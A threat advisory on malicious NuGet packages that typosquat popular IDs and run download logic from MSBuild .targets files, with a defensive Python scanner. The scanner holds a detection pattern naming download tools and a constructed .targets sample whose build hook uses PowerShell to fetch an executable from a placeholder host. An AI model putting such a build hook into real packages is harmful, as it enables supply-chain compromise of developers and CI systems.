Threat Advisory

Analysis of Malicious NuGet Packages

By

Access Point Consulting

Executive Summary 

There is a prolonged and organized campaign that abuses the NuGet package manager to compromise .NET developers and the build environments they work in. The campaign, which began in August 2023, is characterized by the publication of a large number of malicious NuGet packages. The threat actors have adapted their tactics over time: initially they relied on basic downloaders placed in package install scripts, but they have since moved to abusing NuGet's MSBuild integration, which runs package-supplied build logic every time a consuming project is built. This shift indicates a significant level of technical proficiency and persistence on the part of the attackers.

Attack Vector

The attack vector employed by the threat actors centers around a technique known as “typosquatting.” This method involves publishing packages whose names closely resemble those of popular, trusted ones, so a developer who skims a package list or mistypes a package ID can install the wrong package without noticing the subtle difference. The attackers have also taken an unconventional approach to where the malicious code lives: instead of the initialization and post-installation PowerShell scripts (init.ps1 and install.ps1) where such code has traditionally been found, and which run only inside Visual Studio, they place it in the <packageID>.targets file in the package's “build” directory. MSBuild imports that file into the consuming project and executes it on every build, including command-line and CI builds, so the placement both widens the trigger and sidesteps security tooling that only inspects install scripts.

Attack Details

Within this campaign, the attackers follow a specific sequence of operations. The malicious code embedded in the .targets file downloads an executable from a remote location and runs it. This is made possible by NuGet's MSBuild integration, introduced in NuGet 2.5, which automatically imports any build/<packageID>.props and build/<packageID>.targets files shipped in a package into the project that references it. Because these are ordinary MSBuild project files, they can declare targets that run before or after the Build target and invoke tasks such as Exec, or define inline tasks whose code is compiled and executed during the build. By leveraging this capability, the attackers' code runs as a normal step of a dotnet build or Visual Studio build, with no install-time prompt and nothing for the developer to approve, so it does not immediately trigger conventional security alarms.
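As an added example (not code from the original advisory, nor from the packages it describes), the following Python script triages a .nupkg offline for both traits discussed above: a package ID that is a near-miss of a trusted one (the typosquatting vector) and build/ or buildTransitive/ .targets or .props files that execute commands or inline-task code at build time (the MSBuild integration abuse). The trusted-ID list, the package IDs, the sample .targets and .props files and the placeholder URL are all constructed for this example; the suspicious-token list is a starting heuristic, not a signature for this campaign.

```python
"""Offline triage of a .nupkg for two traits: a package ID that is a near-miss
of a trusted one, and build/ or buildTransitive/ .targets or .props files that
run commands or inline task code at build time."""
import difflib
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Assumption: IDs the organisation already depends on. Constructed for this
# example; a real scan would read them from lock files or an internal feed.
TRUSTED_IDS = ["Newtonsoft.Json", "Serilog", "Microsoft.Extensions.Logging"]

# Tokens that, inside an Exec command or inline task body, warrant a human look.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|Invoke-WebRequest|DownloadFile|DownloadString|WebClient|"
    r"Invoke-Expression|\biex\b|certutil|bitsadmin|\bcurl\b|\bwget\b|"
    r"Start-Process|Process\.Start|FromBase64String|-EncodedCommand|-enc\b",
    re.IGNORECASE,
)


def local_name(tag):
    """Strip the XML namespace so old-style and SDK-style MSBuild files compare alike."""
    return tag.rsplit("}", 1)[-1]


def lookalike_of(package_id, trusted=TRUSTED_IDS, cutoff=0.85):
    """Trusted IDs that package_id resembles without matching (possible typosquat).
    NuGet IDs are case-insensitive, so everything is compared in lower case."""
    lowered = {t.lower(): t for t in trusted}
    if package_id.lower() in lowered:
        return []
    hits = difflib.get_close_matches(package_id.lower(), list(lowered), n=3, cutoff=cutoff)
    return [lowered[h] for h in hits]


def build_hooks(file_name, xml_text):
    """List Exec commands and inline-task code found in one .targets/.props file."""
    hooks = []
    root = ET.fromstring(xml_text)
    for target in (t for t in root.iter() if local_name(t.tag) == "Target"):
        when = target.get("BeforeTargets") or target.get("AfterTargets") or "(explicit)"
        for exec_el in (e for e in target.iter() if local_name(e.tag) == "Exec"):
            cmd = exec_el.get("Command", "")
            hooks.append({"file": file_name, "target": target.get("Name"), "runs": when,
                          "kind": "Exec", "detail": cmd,
                          "suspicious": bool(SUSPICIOUS.search(cmd))})
    # Inline tasks: code compiled and run by MSBuild when a target invokes the task.
    for ut in (u for u in root.iter() if local_name(u.tag) == "UsingTask" and u.get("TaskFactory")):
        code = " ".join((c.text or "") for c in ut.iter() if local_name(c.tag) == "Code").strip()
        hooks.append({"file": file_name, "target": None, "runs": "(when a target calls it)",
                      "kind": "UsingTask/" + ut.get("TaskFactory"), "detail": code,
                      "suspicious": bool(SUSPICIOUS.search(code))})
    return hooks


def scan_nupkg(data):
    """Scan .nupkg bytes; return its ID, the trusted IDs it resembles and its build hooks."""
    result = {"id": None, "lookalike_of": [], "hooks": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            low = name.lower()
            if low.endswith(".nuspec") and "/" not in name:  # package manifest at zip root
                for el in ET.fromstring(zf.read(name)).iter():
                    if local_name(el.tag) == "id":
                        result["id"] = (el.text or "").strip()
            elif low.startswith(("build/", "buildtransitive/")) and low.endswith((".targets", ".props")):
                result["hooks"].extend(build_hooks(name, zf.read(name)))
    if result["id"]:
        result["lookalike_of"] = lookalike_of(result["id"])
    return result


def make_nupkg(package_id, files):
    """Build a minimal .nupkg in memory. Constructed test data, not a real package."""
    nuspec = ('<?xml version="1.0"?><package xmlns="http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd">'
              f'<metadata><id>{package_id}</id><version>1.0.0</version>'
              '<authors>example</authors><description>constructed</description></metadata></package>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(f"{package_id}.nuspec", nuspec)
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Constructed .targets showing the shape described above: a target hooked before
# Build that shells out to PowerShell to fetch a file. The URL is a placeholder.
SAMPLE_TARGETS = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="PrepareAssets" BeforeTargets="Build">
    <Exec Command="powershell -NoProfile -Command &quot;Invoke-WebRequest https://example.invalid/tool.exe -OutFile $(IntermediateOutputPath)tool.exe&quot;" />
  </Target>
</Project>"""

# Constructed benign .props: sets a property, runs nothing.
SAMPLE_PROPS = """<Project>
  <PropertyGroup><LangVersion>latest</LangVersion></PropertyGroup>
</Project>"""

if __name__ == "__main__":
    pkg = make_nupkg("Newtonsoft.Jsan", {"build/Newtonsoft.Jsan.targets": SAMPLE_TARGETS,
                                         "build/Newtonsoft.Jsan.props": SAMPLE_PROPS})
    report = scan_nupkg(pkg)
    print(f"{report['id']} resembles trusted IDs: {report['lookalike_of']}")
    for h in report["hooks"]:
        flag = "SUSPICIOUS" if h["suspicious"] else "review"
        print(f"[{flag}] {h['file']} target={h['target']} runs={h['runs']} {h['kind']}: {h['detail'][:70]}")
```

Run it as-is to see the report for the constructed package, or call scan_nupkg(open(path, "rb").read()) on a package pulled from a feed before it is allowed into an internal mirror. A hook in build/ is not malicious by itself, since many legitimate packages ship .props and .targets files, so the output is a review queue rather than a verdict: an Exec or inline task that reaches out to the network, combined with an ID that is one character away from a package already in use, is what should stop a package at the gate.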

Tactics, Techniques, and Procedures (TTPs)

T1189 - Drive-by compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Tokens.

T1035 - Service Execution (revoked; now tracked as T1569.002, System Services: Service Execution)

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.

T1105 – Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as FTP. Once present, adversaries may also transfer or spread tools between victim devices within a compromised environment (see Lateral Tool Transfer).

T1027 - Obfuscated Files or Information

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

T1564.001 - Hide Artifacts: Hidden Files and Directories

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls -a for Linux and macOS).

Associated Bulletins

Malicious NuGet packages abuse MSBuild to install malware (bleepingcomputer.com)

IAmReboot: Malicious NuGet packages exploit loophole in MSBuild integrations (reversinglabs.com)
